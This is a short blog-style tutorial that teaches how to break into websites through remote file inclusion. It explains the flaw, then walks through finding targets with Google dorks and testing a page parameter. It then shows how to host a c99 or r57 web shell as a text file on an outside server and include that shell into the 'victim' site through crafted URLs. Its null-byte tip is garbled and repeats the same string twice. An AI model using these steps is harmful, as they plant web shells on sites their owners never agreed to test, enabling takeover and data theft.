Hacking Site with RFI

What Is RFI(Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

* Code execution on the web server
* Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
* Denial of Service (DoS)
* Data Theft/ManipulationRFI is a very uncommon vulnerability due to excessive patches and updates on websites.
S0 here we go _follow me____!!!!!
Finding a Vulnerable Site using Google Dorks and Checking for vulnerability
Here i provided a link for finding vulnerable sites using   Google Dorks For RFI

Now for testing whether our site is vulnerable to RFI or not we will uss the following command
*www.targetsite.com/index.php?page=www.google.com*
Suppose our target site is*www.aabbcc.com *. So for checking our url will become something like diz
*www.aabbcc.com/v2/index.php?page=http://www.google.com*
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then the site is not vulnerable to RFI.
Exploiting The Vulnerability
For that you will need to upload your shell
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.
http://www.oursite.com/shell.txt

Now comes adding our shell to victims website
Okay, once we are at the vulnerable page (*www.aabbcc.com/v2/index.php?page=http://www.google.com*)
we will have  to replace*”http://www.google.com* *”* and include our own file(in my place its
(*www.oursite.com/shell.txt*)
Our new link should look like this.
*www.aabbcc.com/v2/index.php?page=**www.oursite.com/shell.txt*
*NOTE–> *The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes “shell.txt?” may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from “shell.txt?” try “shell.txt?”.
* *Ok so we uploaded our shell successfully in the target site and i think you all know that what all you can do after uploading shell to the site

Tutorial for Scanning Vulnerable Sites : Click Here  
 

Published by Grey Uzuo

Simple cyber surfer sharing random things with credits.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: